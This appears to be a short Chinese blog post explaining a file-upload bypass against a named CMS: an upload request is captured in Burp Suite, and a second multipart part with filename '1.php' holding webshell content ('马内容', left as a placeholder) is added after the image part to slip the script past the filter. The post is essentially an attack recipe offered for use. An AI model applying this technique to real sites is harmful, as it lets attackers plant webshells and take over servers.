双文件上传突破利用

这个漏洞在南方cms 上出现的

主要是上传时候利用bp抓包 

然后鼠标右键吧数据包发送到Repeater模块

找到你上传的包内容 一般是

------61234564788

Content-Disposition: form-data; name="FileName"; filename=“1.png”

图片内容 

------61234564788--

改成

------61234564788

Content-Disposition: form-data; name="FileName"; filename=“1.png”

图片内容 

------61234564788

Content-Disposition: form-data; name="FileName1"; filename=“1.php”

马内容

------61234564788--

上一篇:374. 猜数字大小


下一篇:C#线程调度AutoResetEvent和ManualResetEvent区别